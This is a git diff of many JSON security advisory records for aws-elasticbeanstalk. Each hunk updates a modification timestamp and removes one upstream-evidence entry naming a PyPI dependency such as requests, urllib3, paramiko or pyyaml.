diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json index 761bb0cafb..a7251480ee 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2008-0299", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json index 3250c2cb58..38d3d988d3 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2011-2185.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2011-2185", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-xwg2-qc6c-7c3q", "CVE-2011-2185", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fabric", - "subject_version": "3.2.2", - "key": "pkg:pypi/fabric@3.2.2", - "resource": "fabric" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json index e6b3749ece..85c76f7fb9 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2013-1633", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json index 599e876a7b..dcab64c72f 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2014-1829", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json index 985358045e..d49054a46f 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2014-1830", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json index 31a6af8839..59fdd13861 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2015-2296", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json index 1fb6e20076..c37ca0300f 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2016-9015", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json index dbd4b8bda4..86fc5ef29e 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2017-18342", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json index 998ae3e5d5..b8925ebb67 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-1000805", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json index 24906be2b5..f814b8b087 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-18074", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json index 9c7b4d14bd..f035a07d49 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-20060", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json index a6fb610b7a..3ca291a6c3 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-25091", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json index 1f2ee6ccf4..0938a7f08a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2018-7750", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json index aed91d9967..0db78975ed 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-11236", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json index b9d207fbeb..f75339b938 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-11324", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json index eeaea95a28..235e285116 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2019-20477", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json index 1f136ea659..0dca5569f7 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-14343", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json index 8c84231bc9..81d29b5cca 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-1747", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json index 641c4be2f5..75dccc3500 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-26137", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json index ffcdea6af4..b6901a2abe 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2020-7212", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json index e53d9ced2b..dd7ec43f72 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2021-28363", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json index 1e0dd39345..3d0755b50b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2021-33503", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json index 04f0c49a03..6325b3cc7d 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2022-24302", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json index 4e401353d4..677d30c9ee 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2022-40897", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json index e342fa4a61..7f319378a5 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-32681", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json index 20b0317b40..15655a0fcc 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-43804", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json index 8bb1537488..2a560e68e6 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-45803", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json index 3efb6a2e22..73992170c8 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2023-48795", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json index e2e0efb27f..18cec6a159 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-35195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json index a3bb723b4a..a8349537c5 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-3651", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json index b3535c52aa..384e4325c6 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-37891", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json index d53cbc63ae..d3041cf371 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json @@ -2,7 +2,7 @@ 